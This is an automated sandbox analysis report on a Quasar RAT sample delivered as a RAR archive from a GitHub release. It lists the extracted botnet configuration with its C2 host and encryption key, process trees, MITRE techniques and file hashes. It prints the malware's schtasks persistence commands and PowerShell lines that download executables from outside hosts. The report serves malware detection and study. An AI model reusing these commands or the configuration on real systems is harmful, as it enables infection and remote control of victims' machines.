quasar | hxxps://github[.]com/cfedss/xMainDab/releases/download/101/xMainDab[.]rar

Analysis

max time kernel
112s
max time network
109s
platform
windows10-2004_x64
resource
win10v2004-20240508-en
resource tags

arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
submitted
03-06-2024 09:38

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://github.com/cfedss/xMainDab/releases/download/101/xMainDab.rar

Score

10^/10

quasar office execution spyware trojan

Malware Config

Extracted

Family

quasar

Version

1.4.0.0

Botnet

Office

espinyskibidi-40205.portmap.host:40205

Mutex

CdrjrrWbtRopP1ic7E

Attributes

encryption_key
P2ctPN6uGReD4W1dEypm
install_name
Client.exe
log_directory
Logs
reconnect_delay
3000
startup_key
Client
subdirectory
Microsoft

Signatures

Quasar RAT
Quasar is an open source Remote Access Tool.
trojan spyware quasar

Quasar payload 2 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\Downloads\Loader.exe	family_quasar
behavioral1/memory/5880-99-0x00000000006C0000-0x000000000070E000-memory.dmp	family_quasar

Blocklisted process makes network request 3 IoCs

Processes:

powershell.exepowershell.exe

flow pid process

70 1356 powershell.exe
72 1356 powershell.exe
96 6092 powershell.exe
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Powershell Invoke Web Request.
execution

PowerShell
T1059.001

Processes:

powershell.exepowershell.exe

pid process

1356 powershell.exe
6092 powershell.exe
Downloads MZ/PE file

flow	pid	process
70	1356	powershell.exe
72	1356	powershell.exe
96	6092	powershell.exe

pid	process
1356	powershell.exe
6092	powershell.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

MainDab.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000\Control Panel\International\Geo\Nation	MainDab.exe

Executes dropped EXE 4 IoCs

Processes:

Loader.exeClient.exeLoader.exeMainDab.exe

pid process

5880 Loader.exe
6120 Client.exe
5380 Loader.exe
5744 MainDab.exe
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service
T1102

Processes:

flow ioc

71 raw.githubusercontent.com
72 raw.githubusercontent.com
88 raw.githubusercontent.com
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

62 ip-api.com
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task/Job
T1053

Processes:

schtasks.exeschtasks.exe

pid process

6076 schtasks.exe
388 schtasks.exe

pid	process
5880	Loader.exe
6120	Client.exe
5380	Loader.exe
5744	MainDab.exe

flow	ioc
71	raw.githubusercontent.com
72	raw.githubusercontent.com
88	raw.githubusercontent.com

flow	ioc
62	ip-api.com

pid	process
6076	schtasks.exe
388	schtasks.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

msedge.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Modifies registry class 1 IoCs

Processes:

msedge.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings msedge.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings	msedge.exe

Suspicious behavior: EnumeratesProcesses 24 IoCs

Processes:

msedge.exemsedge.exeidentity_helper.exemsedge.exepowershell.exepowershell.exeMainDab.exe

pid	process
3984	msedge.exe
3984	msedge.exe
2528	msedge.exe
2528	msedge.exe
4308	identity_helper.exe
4308	identity_helper.exe
960	msedge.exe
960	msedge.exe
1356	powershell.exe
1356	powershell.exe
1356	powershell.exe
6092	powershell.exe
6092	powershell.exe
5744	MainDab.exe
5744	MainDab.exe
6092	powershell.exe
5744	MainDab.exe
5744	MainDab.exe
5744	MainDab.exe
5744	MainDab.exe
5744	MainDab.exe
5744	MainDab.exe
5744	MainDab.exe
5744	MainDab.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 7 IoCs

Processes:

msedge.exe

pid process

2528 msedge.exe
2528 msedge.exe
2528 msedge.exe
2528 msedge.exe
2528 msedge.exe
2528 msedge.exe
2528 msedge.exe

Suspicious use of AdjustPrivilegeToken 9 IoCs

Processes:

7zG.exeLoader.exeClient.exepowershell.exeMainDab.exepowershell.exe

description	pid	process
Token: SeRestorePrivilege	5540	7zG.exe
Token: 35	5540	7zG.exe
Token: SeSecurityPrivilege	5540	7zG.exe
Token: SeSecurityPrivilege	5540	7zG.exe
Token: SeDebugPrivilege	5880	Loader.exe
Token: SeDebugPrivilege	6120	Client.exe
Token: SeDebugPrivilege	1356	powershell.exe
Token: SeDebugPrivilege	5744	MainDab.exe
Token: SeDebugPrivilege	6092	powershell.exe

Suspicious use of FindShellTrayWindow 34 IoCs

Processes:

msedge.exe7zG.exe

pid	process
2528	msedge.exe
2528	msedge.exe
2528	msedge.exe
2528	msedge.exe
2528	msedge.exe
2528	msedge.exe
2528	msedge.exe
2528	msedge.exe
2528	msedge.exe
2528	msedge.exe
2528	msedge.exe
2528	msedge.exe
2528	msedge.exe
2528	msedge.exe
2528	msedge.exe
2528	msedge.exe
2528	msedge.exe
2528	msedge.exe
2528	msedge.exe
2528	msedge.exe
2528	msedge.exe
2528	msedge.exe
2528	msedge.exe
2528	msedge.exe
2528	msedge.exe
2528	msedge.exe
2528	msedge.exe
2528	msedge.exe
2528	msedge.exe
2528	msedge.exe
2528	msedge.exe
2528	msedge.exe
2528	msedge.exe
5540	7zG.exe

Suspicious use of SendNotifyMessage 24 IoCs

Processes:

msedge.exe

pid	process
2528	msedge.exe
2528	msedge.exe
2528	msedge.exe
2528	msedge.exe
2528	msedge.exe
2528	msedge.exe
2528	msedge.exe
2528	msedge.exe
2528	msedge.exe
2528	msedge.exe
2528	msedge.exe
2528	msedge.exe
2528	msedge.exe
2528	msedge.exe
2528	msedge.exe
2528	msedge.exe
2528	msedge.exe
2528	msedge.exe
2528	msedge.exe
2528	msedge.exe
2528	msedge.exe
2528	msedge.exe
2528	msedge.exe
2528	msedge.exe

Suspicious use of SetWindowsHookEx 2 IoCs

Processes:

MainDab.exe

pid process

5744 MainDab.exe
5744 MainDab.exe

pid	process
5744	MainDab.exe
5744	MainDab.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

msedge.exe

description	pid	process	target process
PID 2528 wrote to memory of 208	2528	msedge.exe	msedge.exe
PID 2528 wrote to memory of 208	2528	msedge.exe	msedge.exe
PID 2528 wrote to memory of 1820	2528	msedge.exe	msedge.exe
PID 2528 wrote to memory of 1820	2528	msedge.exe	msedge.exe
PID 2528 wrote to memory of 1820	2528	msedge.exe	msedge.exe
PID 2528 wrote to memory of 1820	2528	msedge.exe	msedge.exe
PID 2528 wrote to memory of 1820	2528	msedge.exe	msedge.exe
PID 2528 wrote to memory of 1820	2528	msedge.exe	msedge.exe
PID 2528 wrote to memory of 1820	2528	msedge.exe	msedge.exe
PID 2528 wrote to memory of 1820	2528	msedge.exe	msedge.exe
PID 2528 wrote to memory of 1820	2528	msedge.exe	msedge.exe
PID 2528 wrote to memory of 1820	2528	msedge.exe	msedge.exe
PID 2528 wrote to memory of 1820	2528	msedge.exe	msedge.exe
PID 2528 wrote to memory of 1820	2528	msedge.exe	msedge.exe
PID 2528 wrote to memory of 1820	2528	msedge.exe	msedge.exe
PID 2528 wrote to memory of 1820	2528	msedge.exe	msedge.exe
PID 2528 wrote to memory of 1820	2528	msedge.exe	msedge.exe
PID 2528 wrote to memory of 1820	2528	msedge.exe	msedge.exe
PID 2528 wrote to memory of 1820	2528	msedge.exe	msedge.exe
PID 2528 wrote to memory of 1820	2528	msedge.exe	msedge.exe
PID 2528 wrote to memory of 1820	2528	msedge.exe	msedge.exe
PID 2528 wrote to memory of 1820	2528	msedge.exe	msedge.exe
PID 2528 wrote to memory of 1820	2528	msedge.exe	msedge.exe
PID 2528 wrote to memory of 1820	2528	msedge.exe	msedge.exe
PID 2528 wrote to memory of 1820	2528	msedge.exe	msedge.exe
PID 2528 wrote to memory of 1820	2528	msedge.exe	msedge.exe
PID 2528 wrote to memory of 1820	2528	msedge.exe	msedge.exe
PID 2528 wrote to memory of 1820	2528	msedge.exe	msedge.exe
PID 2528 wrote to memory of 1820	2528	msedge.exe	msedge.exe
PID 2528 wrote to memory of 1820	2528	msedge.exe	msedge.exe
PID 2528 wrote to memory of 1820	2528	msedge.exe	msedge.exe
PID 2528 wrote to memory of 1820	2528	msedge.exe	msedge.exe
PID 2528 wrote to memory of 1820	2528	msedge.exe	msedge.exe
PID 2528 wrote to memory of 1820	2528	msedge.exe	msedge.exe
PID 2528 wrote to memory of 1820	2528	msedge.exe	msedge.exe
PID 2528 wrote to memory of 1820	2528	msedge.exe	msedge.exe
PID 2528 wrote to memory of 1820	2528	msedge.exe	msedge.exe
PID 2528 wrote to memory of 1820	2528	msedge.exe	msedge.exe
PID 2528 wrote to memory of 1820	2528	msedge.exe	msedge.exe
PID 2528 wrote to memory of 1820	2528	msedge.exe	msedge.exe
PID 2528 wrote to memory of 1820	2528	msedge.exe	msedge.exe
PID 2528 wrote to memory of 1820	2528	msedge.exe	msedge.exe
PID 2528 wrote to memory of 3984	2528	msedge.exe	msedge.exe
PID 2528 wrote to memory of 3984	2528	msedge.exe	msedge.exe
PID 2528 wrote to memory of 1264	2528	msedge.exe	msedge.exe
PID 2528 wrote to memory of 1264	2528	msedge.exe	msedge.exe
PID 2528 wrote to memory of 1264	2528	msedge.exe	msedge.exe
PID 2528 wrote to memory of 1264	2528	msedge.exe	msedge.exe
PID 2528 wrote to memory of 1264	2528	msedge.exe	msedge.exe
PID 2528 wrote to memory of 1264	2528	msedge.exe	msedge.exe
PID 2528 wrote to memory of 1264	2528	msedge.exe	msedge.exe
PID 2528 wrote to memory of 1264	2528	msedge.exe	msedge.exe
PID 2528 wrote to memory of 1264	2528	msedge.exe	msedge.exe
PID 2528 wrote to memory of 1264	2528	msedge.exe	msedge.exe
PID 2528 wrote to memory of 1264	2528	msedge.exe	msedge.exe
PID 2528 wrote to memory of 1264	2528	msedge.exe	msedge.exe
PID 2528 wrote to memory of 1264	2528	msedge.exe	msedge.exe
PID 2528 wrote to memory of 1264	2528	msedge.exe	msedge.exe
PID 2528 wrote to memory of 1264	2528	msedge.exe	msedge.exe
PID 2528 wrote to memory of 1264	2528	msedge.exe	msedge.exe
PID 2528 wrote to memory of 1264	2528	msedge.exe	msedge.exe
PID 2528 wrote to memory of 1264	2528	msedge.exe	msedge.exe
PID 2528 wrote to memory of 1264	2528	msedge.exe	msedge.exe
PID 2528 wrote to memory of 1264	2528	msedge.exe	msedge.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://github.com/cfedss/xMainDab/releases/download/101/xMainDab.rar
1⤵
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2528

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffe902246f8,0x7ffe90224708,0x7ffe90224718
2⤵
PID:208

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2088,16413134349926192874,2864111651329480774,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2104 /prefetch:2
2⤵
PID:1820

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2088,16413134349926192874,2864111651329480774,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2448 /prefetch:3
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:3984

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2088,16413134349926192874,2864111651329480774,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2872 /prefetch:8
2⤵
PID:1264

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,16413134349926192874,2864111651329480774,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3320 /prefetch:1
2⤵
PID:3688

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,16413134349926192874,2864111651329480774,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3328 /prefetch:1
2⤵
PID:676

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2088,16413134349926192874,2864111651329480774,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5376 /prefetch:8
2⤵
PID:2268

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2088,16413134349926192874,2864111651329480774,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5376 /prefetch:8
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:4308

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,16413134349926192874,2864111651329480774,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5244 /prefetch:1
2⤵
PID:3924

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,16413134349926192874,2864111651329480774,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5432 /prefetch:1
2⤵
PID:3364

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2088,16413134349926192874,2864111651329480774,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=4728 /prefetch:8
2⤵
PID:3404

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,16413134349926192874,2864111651329480774,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5620 /prefetch:1
2⤵
PID:4804

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2088,16413134349926192874,2864111651329480774,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5780 /prefetch:8
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:960

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,16413134349926192874,2864111651329480774,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6128 /prefetch:1
2⤵
PID:2496

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,16413134349926192874,2864111651329480774,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6124 /prefetch:1
2⤵
PID:2544

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:2844

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:376

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:5460

C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\" -an -ai#7zMap9114:78:7zEvent14397
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:5540

C:\Users\Admin\Downloads\Loader.exe
"C:\Users\Admin\Downloads\Loader.exe"
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:5880

C:\Windows\SysWOW64\schtasks.exe
"schtasks" /create /tn "Client" /sc ONLOGON /tr "C:\Users\Admin\Downloads\Loader.exe" /rl HIGHEST /f
2⤵
- Creates scheduled task(s)
PID:6076

C:\Users\Admin\AppData\Roaming\Microsoft\Client.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Client.exe"
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:6120

C:\Windows\SysWOW64\schtasks.exe
"schtasks" /create /tn "Client" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Client.exe" /rl HIGHEST /f
3⤵
- Creates scheduled task(s)
PID:388

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\Downloads\Install.cmd"
1⤵
PID:5184

C:\Users\Admin\Downloads\Loader.exe
"\Users\Admin\Downloads\Loader.exe"
2⤵
- Executes dropped EXE
PID:5380

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -C ""Invoke-WebRequest -Uri 'https://github.com/Espiny/test/raw/main/MainDab.exe' -OutFile '\Users\Admin\Downloads\MainDab.exe'""
2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1356

C:\Users\Admin\Downloads\MainDab.exe
"C:\Users\Admin\Downloads\MainDab.exe"
1⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:5744

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C powershell -c Invoke-WebRequest -Uri 'https://k-storage.com/bootstrapper/files/krnl.dll' -OutFile 'C:\Users\Admin\Downloads\krnl.dll'
2⤵
PID:6020

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -c Invoke-WebRequest -Uri 'https://k-storage.com/bootstrapper/files/krnl.dll' -OutFile 'C:\Users\Admin\Downloads\krnl.dll'
3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:6092

C:\Windows\SysWOW64\werfault.exe
werfault.exe /h /shared Global\89f113f47ef541c4bddde32eaf69b391 /t 5752 /p 5744
1⤵
PID:736

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Persistence

Scheduled Task/Job

T1053

Privilege Escalation

Scheduled Task/Job

T1053

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Web Service

T1102

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Loader.exe.log
Filesize
1KB

MD5
10eab9c2684febb5327b6976f2047587

SHA1
a12ed54146a7f5c4c580416aecb899549712449e

SHA256
f49dbd55029bfbc15134f7c6a4f967d6c39142c63f2e8f1f8c78fab108a2c928

SHA512
7e5fd90fffae723bd0c662a90e0730b507805f072771ee673d1d8c262dbf60c8a03ba5fe088f699a97c2e886380de158b2ccd59ee62e3d012dd6dd14ea9d0e50

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\6c232867-95b2-433e-9e37-a50130977164.tmp
Filesize
11KB

MD5
7df0d4536dc467b1cfb50a3cb44bd1b4

SHA1
d6abb808d2b78199a4b9488a982280179cc5170c

SHA256
ccd7f11ec38bb4d81c4c8f4e5eb5e44c66fdad9c06596425dd4e8aca1c268633

SHA512
0ab1a8b6b3bc9a289eb74e8acb4276a4b8e9bee19930bbed98e6ef7b1d4eb54ce0baba30483fc217938f17711216276245537a86d3260692f4bd3f40feded16e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
Filesize
152B

MD5
ce4c898f8fc7601e2fbc252fdadb5115

SHA1
01bf06badc5da353e539c7c07527d30dccc55a91

SHA256
bce2dfaa91f0d44e977e0f79c60e64954a7b9dc828b0e30fbaa67dbe82f750aa

SHA512
80fff4c722c8d3e69ec4f09510779b7e3518ae60725d2d36903e606a27ec1eaedbdbfac5b662bf2c19194c572ccf0125445f22a907b329ad256e6c00b9cf032c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
Filesize
152B

MD5
4158365912175436289496136e7912c2

SHA1
813d11f772b1cfe9ceac2bf37f4f741e5e8fbe59

SHA256
354de4b033ba6e4d85f94d91230cb8501f62e0a4e302cd4076c7e0ad73bedbd1

SHA512
74b4f7b24ad4ea395f3a4cd8dbfae54f112a7c87bce3d286ee5161f6b63d62dfa19bb0d96bb7ed1c6d925f5697a2580c25023d5052c6a09992e6fd9dd49ea82b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
Filesize
265B

MD5
f5cd008cf465804d0e6f39a8d81f9a2d

SHA1
6b2907356472ed4a719e5675cc08969f30adc855

SHA256
fcea95cc39dc6c2a925f5aed739dbedaa405ee4ce127f535fcf1c751b2b8fb5d

SHA512
dc97034546a4c94bdaa6f644b5cfd1e477209de9a03a5b02a360c254a406c1d647d6f90860f385e27387b35631c41f0886cb543ede9116436941b9af6cd3285d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
Filesize
5KB

MD5
7bd1712cc6d31bc1164612ee2a137927

SHA1
ac1277b310f2529ff98093830473ce8921b629d6

SHA256
40f8b364cd92dafc913d49a2c06425ef9f682c836d494d76ed2acaf3342fb6a2

SHA512
5fe0cac7620c1fcbf6c6ae4e9c718a09be9f5e49e69908a342d05cdf6ea504f532e07791b1e8cb1af0c803bb5e89d64b80d048f97971d1a245045fa4d56b852d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
Filesize
6KB

MD5
98c1f6f97a8388f5e53a46415379f994

SHA1
9b8cdcf7f680116431bc82bb3d12fe61e6b0e380

SHA256
bc11c642451c748ca1cadc7dc63481c165b88556c8ea8b2d768a04e1213c3f94

SHA512
df29990c8f034274c375458dc3c223072f9933b63fbfca561731d3672bc78f355dcaae8a8e4c7f46b6a0e881325987cc1809371b180925aa07e528e637026ae7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
Filesize
16B

MD5
6752a1d65b201c13b62ea44016eb221f

SHA1
58ecf154d01a62233ed7fb494ace3c3d4ffce08b

SHA256
0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

SHA512
9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
Filesize
11KB

MD5
75ad9c9c81c535e17f4d5e01a7ed4edf

SHA1
913d798cd9c36b8b3dfe1edba97b34607da1762b

SHA256
52dc02f8c9346ad0d1e364897d8dae64eed73f3b719a9844294fd3ee17ef372d

SHA512
12a83cd323cd3e06a41f6d9e49c8e675175b7e503d90087d1d09ace295a60556b98747ed910311fc1f87579c35762da3c2e2b40d3be561dc85a2c48b971fbe2d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
a2b24af1492f112d2e53cb7415fda39f

SHA1
dbfcee57242a14b60997bd03379cc60198976d85

SHA256
fa05674c1db3386cf01ba1db5a3e9aeb97e15d1720d82988f573bf9743adc073

SHA512
9919077b8e5c7a955682e9a83f6d7ab34ac6a10a3d65af172734d753a48f7604a95739933b8680289c94b4e271b27c775d015b8d9678db277f498d8450b8aff0

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_2ajw53az.nhn.ps1
Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\Downloads\Install.cmd
Filesize
407B

MD5
d605e519c8fb10ecc49055af63c0f213

SHA1
a69b61879040aa541258035461260159ea51369a

SHA256
1452be84cfc1ea5aee5db2011fe8e2a5b72ff2fe637b77696d720734f58eac89

SHA512
304e8825d0afa6f7235859bb2083d728510d48806b06214225978592e8c4f8d065e1bcf3ca9eb39d4312b762a83e1054237d11cecbb3347ef4868bb4574b0e2b

Download Submit
C:\Users\Admin\Downloads\Loader.exe
Filesize
286KB

MD5
4e47b6257fa7e2221df20e6d9f7fc47a

SHA1
7d6116a578f51d87cad1efe9e5971c412eb769a9

SHA256
eeddf97a4c02250bdff26feba1085ff30277d2f71054cd32e8796554fffb23e6

SHA512
6e5e3d2e865fa2c2d229c70f7a10a3821316b91b7daa66ecdfea9dcc7275d30da56f56a90eb64fdbe603e0aa50d5d797c40a4877e48ab0328a6d6ebc06ddd532

Download Submit
C:\Users\Admin\Downloads\MainDab.exe
Filesize
3.4MB

MD5
61c8fbae47137392a395793c6389a7c3

SHA1
a5830825fdf83ebc0c3c71efa08f930ef28c1bac

SHA256
4e5eecfa5d74032e0e84be4735741c3c1487419de546904b1812bbbcdbe40d3d

SHA512
62205d56d2b8672663a903273f1e11af1e4d8c53a8511247d23d7669de7724a7a5e1d12a182f48e829608ed333f395f185a82758e1ddafb5b9a695b86a7c13e1

Download Submit
C:\Users\Admin\Downloads\xMainDab.rar
Filesize
110KB

MD5
da3cd4f40dbda9603d615420f1f03abf

SHA1
6536f4b774c84e94c449f2893adc5f53ecfe5ccb

SHA256
